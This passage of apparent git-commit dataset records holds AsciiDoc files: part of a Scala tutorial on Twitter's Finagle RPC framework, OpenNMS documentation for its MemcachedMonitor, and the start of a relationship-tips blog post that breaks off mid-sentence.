client(req)Note: client(req) is equal to client.apply(req) \n----\nWhat I want to emphasis here is the Load Balancer module. This module brings a lot of benefit for your application. It can simplify your application infstracture. Let's compare it with traditional solution.\n\nimage\n\nAs you can see, the traditional solution highly rely on nginx as load balancer, once nginx dead your service is not reachable, in real production environment, you have master-slave nginx wiht keeplived installed on nginx machine for heartbeat detection. This looks really complex, what about if we can get rid of these nginx?Let's have look at following code.\n[source,scala]\n----\nname: Name =\nName.bound(Address(\"localhost\", 10010), Address(\"localhost\", 10011), Address(\"localhost\", 10012)\n)\n\/\/define a clientval client: Service[http.Request, http.Response] = Http.newService(name, \"client\")\n----\nThis means you supply three addresses and put it into finagle http client. Finagle client will dispatch the request to one of address based on certain load balance algorithmn. The default algorithmn is \"Exponentially Weighted Moving Average (EWMA)\". Now your infstracture architechture becomes like following\n\nimage\n\nPretty simple right. Your apis talk to each other directly.\n\n## Protocol-agnostic\n\nFinagle is a protocol-agnostic RPC system. It means Finagle supports every protocol if people implement it. For example: finagle-thrift is using thrift protocol. finagle-mysql implements the mysql protocol.Now, let's look at this scenario \n\nimage\n\nWe want to make a api count service to count how many times the web service has been called. In section Service and Filter. We send http request and put number as query parameter. It just feel strange that I just want to send a number to count server, to achieve that I have to send a http request. Because I don't use any data from header, cookie and body. If the application is running on AWS, it those junk information cost money. So it's ideal to just send a integer number to api count service. Let's implement this by customize finagle protocol.First, we should tell finagle how to converts an scodec codec into a Netty encoder\n\n[source,scala]\n----\nimport org.jboss.netty.buffer.{ChannelBuffer, ChannelBuffers}import org.jboss.netty.channel.{Channel, ChannelHandlerContext}import org.jboss.netty.handler.codec.oneone.{OneToOneDecoder, OneToOneEncoder}import scodec.Codecimport scodec.bits.BitVector\n\ntrait CodecConversions { \/** * Converts an scodec codec into a Netty encoder. *\/ protected def encoder[A: Codec] =\nnew OneToOneEncoder {\noverride def encode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n\nChannelBuffers.wrappedBuffer( Codec.encodeValid(msg.asInstanceOf[A]).toByteBuffer ) \n}\n\n \/** * Converts an scodec codec into a Netty decoder. \n *\/ protected def decoder[A: Codec] = new OneToOneDecoder { \n override def decode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n msg match { \n case cb: ChannelBuffer => Codec.decodeValidValue[A](BitVector(cb.toByteBuffer)).asInstanceOf[Object] case other => other } \n }\n } \n----\nAnd then channel pipeline and codec factories\n[source,scala]\n----\ntrait Factories { this: CodecConversions => import com.twitter.finagle.{Codec => FinagleCodec, CodecFactory} import org.jboss.netty.channel.{ChannelPipelineFactory, Channels}\n\n \/** * Creates a Netty channel pipeline factory given input and output types. *\/ private[this] def pipeline[I: Codec, O: Codec] = new ChannelPipelineFactory { def getPipeline = { val pipeline = Channels.pipeline() pipeline.addLast(\"encoder\", encoder[I]) pipeline.addLast(\"decoder\", decoder[O]) \n pipeline } \n }\n \/** * Creates a Finagle codec factory given input and output types. *\/ protected def codecFactory[I: Codec, O: Codec] = new CodecFactory[I, O] { \n def server = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[O, I] } \n }\n def client = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[I, O] } \n } \n }\n }\n----\n\n\nAnd then the code that actually creates our Finagle server and client\n\n[source,scala]\n----\nimport java.net.InetSocketAddress\n\nimport com.twitter.conversions.time._import com.twitter.finagle.Serviceimport com.twitter.finagle.builder.{ClientBuilder, ServerBuilder}import com.twitter.util.{Duration, Future}import scodec.Codec\n\nobject IntegerServerAndClient extends Factories with CodecConversions {\n\n \/** * Creates a Finagle server from a service that we have scodec codecs * for both the input and output types. *\/ def server[I, O](port: Int)(service: Service[I, O])(implicit ic: Codec[I], oc: Codec[O]) = ServerBuilder() \n .name(\"server\") \n .codec(codecFactory[I, O]) \n .bindTo(new InetSocketAddress(port)) .build(service)\n \n \/** * Creates a Finagle client given input and output types with scodec codecs. *\/ def client[I, O](host: String, timeout: Duration = 3.second) (implicit ic: Codec[I], oc: Codec[O]) = ClientBuilder() \n .name(\"client\") \n .codec(codecFactory[I, O]) \n .hosts(host) \n .timeout(timeout) \n .build()\n }\n----\n\nDefine our simple service\n[scala,source]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Future\n\nclass IntegerService extends Service[Int, Int]{ var count = 0 override def apply(request: Int): Future[Int] = { Future.value(count + request) }\n}\n----\n\nRun a server\n\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Server { def main(args: Array[String]): Unit = { implicit val intgerCodec = \nscodec.codecs.uint8\n\n val service: Service[Int, Int] =\n new IntegerService \n val server = IntegerServerAndClient.server[Int, Int](9191)(service) Await.ready(server) \n }\n }\n----\nRun a client\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Client { def main(args: Array[String]): Unit = {\n\n implicit val intgerCodec = scodec.codecs.uint8\n\n \/\/define a client \n val client: Service[Int, Int] = IntegerServerAndClient.client[Int, Int](\"localhost:9191\") \/\/define a request \n val request = 4 \n \/\/apply request on the client \n val response = client(request) \n \/\/print response response.foreach(rep => println(s\"This is response $rep\")) \n Await.result(response) \n }\n }\n----\n## Conclusion\nFinagle is a very flexible asychronous, protocol-agnostic RPC framework. It can help you to build high performance micro service with any protocol. It is worth to take a look at Finch the web framework based on Finagle. You can find more detail introduction from https:\/\/blog.twitter.com\/2011\/finagle-a-protocol-agnostic-rpc-system[Twitter blog] and more detailed example from http:\/\/twitter.github.io\/scala_school\/searchbird.html[Twitter scala school].\n\n\n\n\n\n\n\n\n\n\n","old_contents":"= An Introduction to Finagle by example\n(Yue;Li)\n:hp-image: \/covers\/cover.png\n:published_at: 2016-11-28\n:hp-tags: Finagle\n\nIt is a challenging task to build a large-scale web application, there are fundamental characteristics to take into account: for example, efficiency, safety and robustness. Finagle is a asynchronous, Netty based JVM RPC system made by Twitter which makes it easy to build high available clients and servers in Java and Scala. And it can even simplify your application architecture. Here I want to show you how powerful Finagle is.\n\n== Quickstart\nLet's first have a quick look about how to create a Finagle micro web service and a Finagle http client to consume this api.Create a sbt project and import dependencies.\n[source,scala]\n----\nlibraryDependencies ++= Seq( \n\"com.twitter\" %% \"finagle-http\" % \"6.38.0\", \n\"org.scalatest\" %% \"scalatest\" % \"2.2.4\" % \"test\"\n)\n----\nFirst, let's define a service. Here we define a service to receive a http request and get its url parameter as Integer then return a http response by plus 10.\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Futureimport com.twitter.finagle.http\n\nThis is a plus 10 serviceclass PlusTenService extends Service[http.Request, http.Response] {\n\n\n override def apply(request: http.Request): Future[http.Response] = { \n Future { \n val input = request.getIntParam(\"num\") \n val output = input + 10 \n val response = http.Response(request.version, http.Status.Ok) response.setContentString(output.toString) \n response } }\n}\n----\nThen initiate and start our server\n[source,scala]\n----\nimport com.twitter.finagle.{http, Service, Http}import com.twitter.util.Await\n\nobject QuickLookServer { def main(args: Array[String]): Unit = { val service: Service[http.Request, http.Response] = new PlusTenService val server = Http.serve(\":9090\", service) Await.ready(server) }}\n----\nLast let's define a client to consume this server.\n[source,scala]\n----\nimport com.twitter.finagle.{Service, Http}import com.twitter.finagle.httpimport com.twitter.util.Await\n\nobject QuickLookClient { def main(args: Array[String]): Unit = { \/\/define a client val client: Service[http.Request, http.Response] = Http.newService(\"localhost:9090\") \n\/\/define a request \nval request = http.Request(http.Method.Get, \"\/?num=5\") \n\/\/apply request on the client \nval response = client(request) \n\/\/print response \nresponse.foreach(rep => println(rep.getContentString()))\nAwait.result(response) }\n}\n----\nIf you run the two application you will see the server running on localhost:9090 and client get response 15. Simple right? As you can see our service and client are both type of Service[http.Request, http.Response] . This data type really confuse me in the beginning. I will explan what's the differences between them. \n\n== The core of Finagle\nService\n\nNow let's first have a look at the core of finagle Service[-Req, +Rep] . You can find the definition in com.twitter.finagle.Service . In Finagle 6.38.0 the definition of Service is an abstract class, in previous version it was a trait\n[source,scala]\n----\nabstract class Service[-Req, +Rep] extends (Req => Future[Rep])\n----\nA service is a function that takes request of type Req, and return a response of Future of Rep. This Services type are used to represent both clients and servers. To answer my previous question, the differences between service and client is that a Finagle client \u201cimports\u201d a Service from the network. However, a Finagle server \u201cexports\u201d a Service to the network.Note: the Future here is twitter future not scala future. There is no differences on conception.\n\nFilter\n\nSome times we want to add application-agnostic behaviour, we can use Filter to achieve this.\n[source,scala]\n----\nabstract class Filter[-ReqIn, +RepOut, +ReqOut, -RepIn] \nextends ((ReqIn, Service[ReqOut, RepIn]) \n=> Future[RepOut])\n----\n\nimage\n\nIf it is not clear please check image below.\n\nimage\n\nIn most common cases, ReqIn is equal to ReqOut, and RepIn is equal to RepOut. So we have this SimpleFilter class\n\n[source,scala]\n----\nabstract class SimpleFilter[Req, Rep] extends Filter[Req, Rep, Req, Rep]\n----\nA filter can attached to client and server side. Let's try to implement a simple timeout filter.\n[source,scala]\n----\nimport com.twitter.finagle.{SimpleFilter, Service}import com.twitter.util.{Duration, Timer, Future}\n\nclass TimeoutFilter[Req, Rep](timeout: Duration, timer: Timer)\nextends SimpleFilter[Req, Rep] {\n\n def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = { \n val res = service(request) \n res.within(timer, timeout) }\n }\n----\nHere, a timeout filter is a class extends SimpleFilter trait. Below is how to use this filter on client side\n[source,scala]\n----\nclient = Http.newService(\"localhost:9090\")\n\nval timeoutFilter = new TimeoutFilter[http.Request, http.Response](Duration.fromSeconds(1),\nnew JavaTimer(false))\n\nval clientWithTimeoutFilter = timeoutFilter.andThen(quickLookClient)\n----\n\nA filter can be applied on server side too. Here is an example. First let's define a filter.\n\n[source,scala]\n----\nclass CountFilter[Req, Rep](countClient: Service[http.Request, http.Response])\nextends SimpleFilter[Req, Rep]\n{ override def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = \n{ val countRequest = http.Request(http.Method.Post, \"\/?count=5\") countClient(countRequest) service(request) }}\n----\nAnd then let's use it on our plusTen service\n[source,scala]\n----\nal service: Service[http.Request, http.Response] = new PlusTenService\n\nval countClient = Http.newService(\"localhost:9010\")\n\nval countFilter = new CountFilter[http.Request, http.Response](countClient)\n\nval serviceWithCountFilter = countFilter.andThen(service)\n----\nYou may notice the way to chain filter and service together is by using andThen method. Actually andThen method can not only chain filter with service but also chain multiple filters, like filter1 andThen filter2 andThen myservice \n\n## Client\nThis is the part that I like the most in finagle. Finagle http client is designed to maximize success and minimize latency. Each request will flow through various modules. These modules are logically separated into three stacks: Client stack, Endpoint stack, connection stack.\n\n*Client stack*\n\nmanages name resolution and balances requests across multiple endpoints.\n\n*Endpoint stack*\n\nprovides circuit breakers and connection pooling.\n\n*connection stack*\n\nprovides connection life-cycle management and implements the wire protocol.\n\nTo use finagle http client is very simple. Define a client first and define a http request, then apply request on the client.\n\n[source,scala]\n----\n\/\/ create a http clientval client = \nHttp.client.newService(\"example.com:80\")\n\/\/ create a http requestval req =\nRequest(\"\/foo\", (\"my-query-string\", \"bar\")\n)\n\/\/ apply request on the clientval resp: Future[Response] = client(req)Note: client(req) is equal to client.apply(req) \n----\nWhat I want to emphasis here is the Load Balancer module. This module brings a lot of benefit for your application. It can simplify your application infstracture. Let's compare it with traditional solution.\n\nimage\n\nAs you can see, the traditional solution highly rely on nginx as load balancer, once nginx dead your service is not reachable, in real production environment, you have master-slave nginx wiht keeplived installed on nginx machine for heartbeat detection. This looks really complex, what about if we can get rid of these nginx?Let's have look at following code.\n[source,scala]\n----\nname: Name =\nName.bound(Address(\"localhost\", 10010), Address(\"localhost\", 10011), Address(\"localhost\", 10012)\n)\n\/\/define a clientval client: Service[http.Request, http.Response] = Http.newService(name, \"client\")\n----\nThis means you supply three addresses and put it into finagle http client. Finagle client will dispatch the request to one of address based on certain load balance algorithmn. The default algorithmn is \"Exponentially Weighted Moving Average (EWMA)\". Now your infstracture architechture becomes like following\n\nimage\n\nPretty simple right. Your apis talk to each other directly.\n\n## Protocol-agnostic\n\nFinagle is a protocol-agnostic RPC system. It means Finagle supports every protocol if people implement it. For example: finagle-thrift is using thrift protocol. finagle-mysql implements the mysql protocol.Now, let's look at this scenario \n\nimage\n\nWe want to make a api count service to count how many times the web service has been called. In section Service and Filter. We send http request and put number as query parameter. It just feel strange that I just want to send a number to count server, to achieve that I have to send a http request. Because I don't use any data from header, cookie and body. If the application is running on AWS, it those junk information cost money. So it's ideal to just send a integer number to api count service. Let's implement this by customize finagle protocol.First, we should tell finagle how to converts an scodec codec into a Netty encoder\n\n[source,scala]\n----\nimport org.jboss.netty.buffer.{ChannelBuffer, ChannelBuffers}import org.jboss.netty.channel.{Channel, ChannelHandlerContext}import org.jboss.netty.handler.codec.oneone.{OneToOneDecoder, OneToOneEncoder}import scodec.Codecimport scodec.bits.BitVector\n\ntrait CodecConversions { \/** * Converts an scodec codec into a Netty encoder. *\/ protected def encoder[A: Codec] =\nnew OneToOneEncoder {\noverride def encode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n\nChannelBuffers.wrappedBuffer( Codec.encodeValid(msg.asInstanceOf[A]).toByteBuffer ) \n}\n\n \/** * Converts an scodec codec into a Netty decoder. \n *\/ protected def decoder[A: Codec] = new OneToOneDecoder { \n override def decode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n msg match { \n case cb: ChannelBuffer => Codec.decodeValidValue[A](BitVector(cb.toByteBuffer)).asInstanceOf[Object] case other => other } \n }\n } \n----\nAnd then channel pipeline and codec factories\n[source,scala]\n----\ntrait Factories { this: CodecConversions => import com.twitter.finagle.{Codec => FinagleCodec, CodecFactory} import org.jboss.netty.channel.{ChannelPipelineFactory, Channels}\n\n \/** * Creates a Netty channel pipeline factory given input and output types. *\/ private[this] def pipeline[I: Codec, O: Codec] = new ChannelPipelineFactory { def getPipeline = { val pipeline = Channels.pipeline() pipeline.addLast(\"encoder\", encoder[I]) pipeline.addLast(\"decoder\", decoder[O]) \n pipeline } \n }\n \/** * Creates a Finagle codec factory given input and output types. *\/ protected def codecFactory[I: Codec, O: Codec] = new CodecFactory[I, O] { \n def server = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[O, I] } \n }\n def client = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[I, O] } \n } \n }\n }\n----\n\n\nAnd then the code that actually creates our Finagle server and client\n\n[source,scala]\n----\nimport java.net.InetSocketAddress\n\nimport com.twitter.conversions.time._import com.twitter.finagle.Serviceimport com.twitter.finagle.builder.{ClientBuilder, ServerBuilder}import com.twitter.util.{Duration, Future}import scodec.Codec\n\nobject IntegerServerAndClient extends Factories with CodecConversions {\n\n \/** * Creates a Finagle server from a service that we have scodec codecs * for both the input and output types. *\/ def server[I, O](port: Int)(service: Service[I, O])(implicit ic: Codec[I], oc: Codec[O]) = ServerBuilder() \n .name(\"server\") \n .codec(codecFactory[I, O]) \n .bindTo(new InetSocketAddress(port)) .build(service)\n \n \/** * Creates a Finagle client given input and output types with scodec codecs. *\/ def client[I, O](host: String, timeout: Duration = 3.second) (implicit ic: Codec[I], oc: Codec[O]) = ClientBuilder() \n .name(\"client\") \n .codec(codecFactory[I, O]) \n .hosts(host) \n .timeout(timeout) \n .build()\n }\n----\n\nDefine our simple service\n[scala,source]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Future\n\nclass IntegerService extends Service[Int, Int]{ var count = 0 override def apply(request: Int): Future[Int] = { Future.value(count + request) }\n}\n----\n\nRun a server\n\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Server { def main(args: Array[String]): Unit = { implicit val intgerCodec = \nscodec.codecs.uint8\n\n val service: Service[Int, Int] =\n new IntegerService \n val server = IntegerServerAndClient.server[Int, Int](9191)(service) Await.ready(server) \n }\n }\n----\nRun a client\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Awaitimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Client { def main(args: Array[String]): Unit = {\n\n implicit val intgerCodec = scodec.codecs.uint8\n\n \/\/define a client \n val client: Service[Int, Int] = IntegerServerAndClient.client[Int, Int](\"localhost:9191\") \/\/define a request \n val request = 4 \n \/\/apply request on the client \n val response = client(request) \n \/\/print response response.foreach(rep => println(s\"This is response $rep\")) \n Await.result(response) \n }\n }\n----\n## Conclusion\nFinagle is a very flexible asychronous, protocol-agnostic RPC framework. It can help you to build high performance micro service with any protocol. It is worth to take a look at Finch the web framework based on Finagle. You can find more detail introduction from https:\/\/blog.twitter.com\/2011\/finagle-a-protocol-agnostic-rpc-system[Twitter blog] and more detailed example from http:\/\/twitter.github.io\/scala_school\/searchbird.html[Twitter scala school].\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6ba70d1ba712e515651112dd1a0464c24afe3ca3","subject":"NMS-6672: Documentation MemcachedMonitor","message":"NMS-6672: Documentation MemcachedMonitor\n\n- Added generic description\n- Added table with collected metrics\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/MemcachedMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/MemcachedMonitor.adoc","new_contents":"\n=== MemcachedMonitor\n\nThis monitor allows to monitor link:http:\/\/memcached.org[Memcached], a distributed memory object caching system.\nTo monitor the service availability the monitor tests if the _Memcached_ statistics can be requested.\nThe statistics are processed and stored in RRD files.\nThe following metrics are collected:\n\n.Collected metrics using the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Metric | Description\n| _uptime_ | Seconds the _Memcached_ server has been running since last restart.\n| _rusageuser_ | User time seconds for the server process.\n| _rusagesystem_ | System time secondes for the server process.\n| _curritems_ | Number of items in this servers cache.\n| _totalitems_ | Number of items stored on this server.\n| _bytes_ | Number of bytes currently used for caching items.\n| _limitmaxbytes_ | Maximum configured cache size.\n| _currconnections_ | Number of open connections to this _Memached_.\n| _totalconnections_ | Number of successful connect attempts to this server since start.\n| _connectionstructure_ | Number of internal connection handles currently held by the server.\n| _cmdget_ | Number of _GET_ commands received since server startup.\n| _cmdset_ | Number of _SET_ commands received since server startup.\n| _gethits_ | Number of successful _GET_ commands (cache hits) since startup.\n| _getmisses_ | Number of failed _GET_ requests, because nothing was cached.\n| _evictions_ | Number of objects removed from the cache to free up memory.\n| _bytesread_ | Number of bytes received from the network.\n| _byteswritten_ | Number of bytes send to the network.\n| _threads_ | Number of threads used by this server.\n|===\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.MemcachedMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Timeout in milliseconds for Memcached connection establishment. | optional | `3000`\n| `retry` | Number of attempts to establish the Memcached connnection. | optional | `0`\n| `port` | TCP port connecting to Memcached. | optional | `11211`\n|===\n\n==== Examples\n\nThe following example shows a configuration in the 'poller-configuration.xml'.\n\n[source, xml]\n----\n<service name=\"Memcached\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"port\" value=\"11211\" \/>\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"3000\" \/>\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"ds-name\" value=\"memcached\" \/>\n <parameter key=\"rrd-base-name\" value=\"memcached\" \/>\n<\/service>\n\n<monitor service=\"Memcached\" class-name=\"org.opennms.netmgt.poller.monitors.MemcachedMonitor\" \/>\n----\n","old_contents":"\n=== MemcachedMonitor\n\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.MemcachedMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the MemcachedMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `timeout` | Timeout in milliseconds for Memcached connection establishment. | optional | `3000`\n| `retry` | Number of attempts to establish the Memcached connnection. | optional | `0`\n| `port` | TCP port connecting to Memcached. | optional | `11211`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"1\"\/>\n <parameter key=\"banner\" value=\"SSH\"\/>\n <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n <parameter key=\"timeout\" value=\"5000\"\/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c1725848dc4353831067f0b73b60c2f49b2f2604","subject":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","message":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_contents":"= 101 Tips To Improve Your Relationship \n:hp-image: https:\/\/user-images.githubusercontent.com\/19504323\/34144297-e38e3492-e4cb-11e7-939e-27d271d97f4d.png\n:published_at: 2017-07-21\n:hp-tags: tips, relationship\n:hp-alt-title: 101 Tips To Improve Your Relationship\n:linkattrs:\n\n\nBeing part of a couple is hard, but the best relationship tips are really all about maintenance. You\u2019ve got to keep things fresh, find time for each other, and come up with ways to navigate the tricky ups and downs every partnership faces. That all sounds a lot easier than it really is, so we\u2019ve come up with 101 ways to make your relationship even better.\n\nFrom how to deal with jealousy to how to get over a potentially deadly lull, we\u2019ve got 101 relationship tips that you can start implementing right now.\n\nAlso Read: http:\/\/amzn.to\/2CCdNo4[How to Be an Adult in Relationships: The Five Keys to Mindful Loving^]\n\n1. Listen.\nIt might sound obvious, but when you really allow yourself to listen\u2014and ask questions about\u2014what your partner says, it not only leads to better conversations, but also better communication.\n2. Take a few days apart.\nMissing each other is a great way to reconnect. Try grabbing some girlfriends for an overnight or a weekend getaway every few months.\n3. Find a support team.\nHave a handful of great friends or family members you can call so your significant other doesn\u2019t have to hear every small grievance going on your life.\nMORE: 9 Things Every Woman Deserves in a Relationship\n4. Put away your phones.\nOne of the biggest relationship tips is to give your undivided attention when your partner is speaking. It\u2019s is one of the most important things you can do.\n5. Volunteer together.\nGiving back is a great way to keep perspective of how great your relationship is, and how lucky you both are.\n6. Create a checklist.\nJot down new and fun things you want to accomplish for a day as a duo.\n7. Talk to couples over 65 years old. \nGet relationship tips from them, and see what you can take away to apply to your relationship.\n8. Stop and appreciate all that your relationship is this very second.\nStop living for what it can be. This person is choosing to be in your life every day, not every day in the future.\n9. Revisit the questions you asked in the beginning.\nWhat are you hoping to accomplish in the next year? What are you scared of? These answers change, so we need to keep asking these questions.\n. Find 10 things you really love about them and tell them. \nGuys need confidence boosters, too!\n. Stop nagging. \nSeriously, stop. Take a step back and figure out the big things about your partner that truly bother you, and approach them from a place of concern and support instead of nitpicking for sport. That\u2019ll get you nowhere.\n. Get over needing to be right. \nLearning to say \u201cI was wrong\u201d is a skill worth learning.\n. Take care of yourself. \nNo relationship can be successful if you don\u2019t feel good about yourself, both inside and out.\n. Know what you need and then ask for it.\nYou\u2019re dating a human, not a magical psychic.\n. Take a class.\nIt\u2019s proven that couples who learn together connect deeper. Find some common ground (cooking? art? science?) and go from there. \n. Stop complicating things that aren\u2019t complicated enough.\nDon\u2019t pull a Carrie Bradshaw during the Aiden years: If you bemoan the fact that your relationship is going too well, you might need to revisit why you\u2019re constantly seeking out drama.\n. Assume that if something was said that hurt your feelings, it wasn\u2019t intended that way.\nWhy would they want to upset you or hurt you? Give your partner the benefit of the doubt, but if it\u2019s really bothering you, don\u2019t be afraid to bring it up.\n. Write notes.\nWhether you have study hall together or live together, handwritten notes are personal touches in today\u2019s highly digital world. \n. Pitch in.\nHelp each other with chores and other necessary, if banal, activities \u2014 cooking, cleaning, re-organizing, etc. Not doing them if you live together can create tension, and always doing them can create unfair expectations. Act as team of equals.\n. Disconnect.\nStep away from the laptop during quality time. Everything on the Internet will still be there later.\nMORE: The Best Short-Lived Celebrity Relationships of 2016\n. Allow things to be what they are.\nSometimes bad days and bad moods happen. Don\u2019t go crazy trying to make everything better. Just be supportive and loving, because just being there at the end of a bad day can make it better for both of you.\n. Create mini-traditions.\nCreating small rituals can really help hold up a couple because they become \u201cyour thing.\u201d Whether it\u2019s a fancy night out during the holiday season, or watching a certain show every week, these are things that\u2019ll give you both something to look forward to, and it\u2019ll bring you closer together.\n. Be an open book.\nThey can either deal with it or they can\u2019t, but if you can\u2019t be your most honest self with this person, it\u2019ll come out eventually.\n. Compliment, and often.\nYou\u2019re there to make each other feel like your best selves, so let the genuine praise flow freely. Like his outfit? Tell him! Like her hair today? Let her know!\n. Make promises that you really can keep.\nSay things that you want to follow through with out loud. It\u2019ll make you work harder to make them happen. Having\u2014and setting\u2014levels of reasonable expectations for your relationship is a healthy way to keep it strong.\n. Acknowledge positive actions.\nWhen you and your partner see positive actions, solutions, or behavior in one another, acknowledge it and remind each other to keep it up.\n. Establish genuine connections with the other\u2019s friends and family.\nHang out together with both of your friends and family. This is the stuff that makes the world go \u2019round, people!\n. Pay attention to the tiny things that bother your partner, and if it\u2019s painless for you, work to change them. \nWe\u2019re not talking changing your laugh or your style, but if you know that your partner really hates it when you leave the kitchen counter cluttered, try to make a point of clearing it off before he gets home. It\u2019s an easy enough thing to do and it makes their day better, so why not?\n. Never, never forget to ask about the other person\u2019s day. \nIt\u2019s such an easy slight to avoid!\n. Only one person gets to have the bad day. \nIf your partner\u2019s day sucked and yours was just \u201ceh,\u201d let them have the pity (and the control of the remote, and the choice of take-out). If it\u2019s you, announce it early and let them know you need the support. If it\u2019s a toss-up, trade stories about why your days were so awful and you\u2019ll end up laughing while trying to figure out who wins.\n. Small gifts go a long way.\nBringing home a pack of their favorite candy\/magazine\/book by a favorite author never gets old.\n. Graham Parsons has a song lyric that says \u201cI just want to hold you, I don\u2019t want to hold you down.\u201d\nLet that be your motto when you\u2019re giving your partner advice.\n. Log onto Instagram and like all their photos.\nJust because.\n. Plan a date where you revisit the spot you went on your first date.\nRemember all the amazing things that brought you from then to now.\n. Go on a walk together somewhere beautiful.\nAnd don\u2019t forget to turn off your cell phones.\n. Surprise them with dinner.\nOne unexpected night, surprise your partner with a home-cooked meal, and a nicely-set table.\n. Review your top five favorite funny things your partner has done.\nBecause your partner is funny! That\u2019s part of why you like them.\n. Go to a yoga class together.\nOr other exercise class together. Your body and relationship will thank you!\n. Go on a road trip, even if you\u2019re not going anywhere far. \nIt\u2019s nice to get out of town sometimes.\n. Pick up a six-pack of toilet paper or (even better) a six-pack of beer.\nWithout even being asked.\n. Keep the surprises coming.\nThink of your relationship as a creative challenge. To keep the romance fresh, come up with new date ideas, new sex positions, and new ways to demonstrate your love.\n. Plan small outings.\nWhether its brunch this weekend, or a trip to a new neighborhood.\n. Make out.\nKissing is something that is often set to the side the longer a couple has been together. Out of blue one day, initiate a high-school style make-out session.\n. Let it go.\nDon\u2019t hold onto that thing your lover said or did six months ago and bring it up each time you get mad at him. Do both of you a favor and let it go\n. Don\u2019t interrupt. \nEven if what you think your significant other is saying is uninteresting, don\u2019t bulldoze over his or her words. Being able to listen to each other\u2014even when the details are mundane\u2014is important.\n. Say thanks. \nLet him know that you notice the little things he does by saying thank you for routine tasks like walking the dog or picking up groceries.\n. Cook a meal together.\nCome up with a menu, shop, and prepare the food together.\n. Have fun with hypotheticals.\nConversation can become routine. Break from the ordinary and have a silly dinner conversation made entirely of imaginary situations\u2014for example, \u201cIf you were on an island and could only bring five movies, which movies would you bring?\n. Keep a couple\u2019s journal. \nWrite down your desires and fantasies and leave them out for your significant other to find\u2014encourage him to write back.\n. Agree to disagree. \nThis is one of the most important relationship tips, as you both have strong opinions and therefore some issues will never be resolved. Respect each other\u2019s point of view and agree not to argue about the same issue, unless it\u2019s something that could get in the way of your future, like politics, religion, or values.+++<div id=\"amzn-assoc-ad-362ca55c-c25e-4b62-99e7-044b18860126\"><\/div><script async src=\"\/\/z-na.amazon-adsystem.com\/widgets\/onejs?MarketPlace=US&adInstanceId=362ca55c-c25e-4b62-99e7-044b18860126\"><\/script>+++\n. Set goals. \nIn addition to setting life goals, set relationship goals. For example: We aim to spend more time together outside rather than in front of the TV.\n. Take responsibility for your own happiness\nLove is grand, but at the end of the day the only person we can hold accountable for our happiness is ourselves. Do volunteer work, exercise, host dinner parties\u2014find what satisfies you, and go from there.\nMORE: WTF! Taylor Swift Has Never Walked a Red Carpet with a Boyfriend\n. Learn each other\u2019s conflict habits.\nMake an effort to understand you and your partner\u2019s conflict habits so you can break bad patterns and find a middle ground that\u2019s productive and respectful.\n. Define love. \nWhile \u201cI love you,\u201d is an extraordinary thing to say\u2014and an equally wonderful thing to hear\u2014it means something different to each person. Tell 